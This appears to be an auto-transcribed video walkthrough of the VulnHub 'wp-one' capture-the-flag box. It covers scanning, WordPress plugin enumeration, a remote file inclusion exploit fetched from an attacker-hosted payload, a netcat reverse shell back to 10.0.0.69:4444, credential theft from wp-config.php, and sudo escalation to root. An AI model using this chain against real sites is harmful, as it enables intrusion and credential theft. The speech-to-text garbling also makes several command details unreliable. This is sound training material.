Yo, what's going on, guys? In this video, we're going to be doing wp-one from VulnHub. This is Mock's word about easy. And yeah, hope you guys enjoy. Alright, so I'm going to start by opening my terminals here. I'm going to start by running a netdiscover -r 10.0.0.1 for my gateway /it0 for my interface. Doing this, we do get that be the box 10.0.0.133. So I'm going to do Control-Shift-Z and start by running nmap scan. So we'll do nmap -sc for default scripts, -sv for enumeration, and we scan all ports in the IP. Doing this, I'm going to do -v for verbose. Look at the ports. We do have port 22 open for SSH and port 80 open for HTTP. Let's try visiting port 80. Doing this, it is telling us to read the root.txt because it is part of the challenge, right? So I'm going to do Control-U to the source code. And it doesn't seem like you do have anything, right? So I'm just going to copy this and start by doing some enumeration and running a codebuster. So do codebuster dir mode -u enter the IP address -w for /user share word list. We'll do dirbuster directory. Let's do window medium.txt. We'll do extensions as HTML, TXT, and also PHP. Look at the ports. We do have port 22 open for SSH and port 80 open for HTTP. This is running Apache. And seems like that's about it, right? Look at the codebuster. We do have robots.txt. So I'm going to start by visiting robots.txt. And it doesn't seem like we do anything, right? We just do have a directory as secret. But it does seem like this is not even a directory, right? We're going to go to /WordPress. So it does seem like this is running WordPress. So while this is loading, I'm just going to copy this and we're going to start scanning with wp-scan. So I'm sitting into my documents. I'm going to go to wp-scan. We'll do ruby wp-scan.rb. And we're going to start enumerating for some users, right? So I'm just going to copy this. So you do know the IP address is HTTP 10.0.0.133 /WordPress. You can press enter on that. And it did find a login as admin, right? Another thing I'm going to do is actually change from the U to a letter P so we can enumerate for the plugins. So we can press enter on that. And here it does seem like it did find a commit version 4.1.6 and also another plugin as socialware for 3.5.2, right? So I'm just going to copy this and start by searching for an exploit for this. And it does seem like we can get RC on the box, right? This is 3.5.3. This means it can be below. This is running 3.5.2, right? So we can get RC, right? So I'm going to go back here. Let's see if we can go to like the official documentation from wpscan.com. Because this gives us proper documentation on how to exploit this. So here it just gives us a POC, proof of concept. Here we can create a payload file and basically we start a Python server, right? Which is accessible by the target website. And this seems like this is the payload, right? It is using system command to cat out the /etc password. So I'm starting by splitting my terminals here. I'm just going to name this file .txt. We'll just put this in here. I'm actually going to change, let's go to interactive mode. I'm going to change from, instead of catting out /etc password, I'm going to cat out, or I'm going to just run an ID command, right? Then we can start by visiting this website right here. So I'm just going to copy this and change this to 10.0.0.133. We can do /WordPress. And for the attacker host, we do need to set up a server. So I'm just going to do this on 10.0.0.69 on port 8081. And then we do have file.txt, right? So doing this, I'm going to start my Python server. So do python 3 -m http.server on port 8081. And we do our file.txt there. So I'm going to press on that. And we are under www data, right? Next thing I'm going to start by doing is checking for, see if we do have netcat on the machine, right? So I'm just going to run like a witch and see if we do have netcat on there. I'm going to right quit. Start my Python server again. And we do have user bin netcat, right? So here we can start up a listener. Do Control-Shift-Z. We'll do all wrap netcat -lmvp on 4444. And we do have netcat, right? So I'm going to VI into file.txt. So do netcat 10.0.0.69. We'll do this on 4444. We'll execute a/bin/bash. I'm just going to right quit. start our Python server one more time. Press it on that. And we do get a connect, right? We do ID. Now we are www data, right? So I'm gonna start by exporting my term is equal to xterm. I'm gonna start by writing a bin/bash -i. I'm gonna do like which Python 3. It does seem like we do have Python 3, so do Python 3 -c. We'll do import pty pty.spawn. We'll run this into bin/bash, right? And we are www data at the host name for wp-on, right? So doing this, I'm gonna start looking for some creds under wp-config.php. So I'm just cat this out. I'm gonna grab -i for pass, and also the same thing for user. And it does seem like we do get a password here, right? So I'm gonna try a password reuse on this for home. And we do have a user as Takis. It does seem like that is the password. So I'm gonna do sudo -l. It does seem like we can run sudo on all commands. So I'm gonna do sudo switch users. We can cd into root, ls. We can counter root.txt, right? Doing this, it is telling us that they left the root.txt flag into a USB. So I'm just gonna search up, do find, and we'll just grep out for USB, right? And this seems like we do have a file as root right here. So we'll cat this out. And it does seem like this is our root.txt, right? Well, guys, that's pretty much in the video. Don't forget to like and subscribe. And I'll catch you guys in the next one. Peace.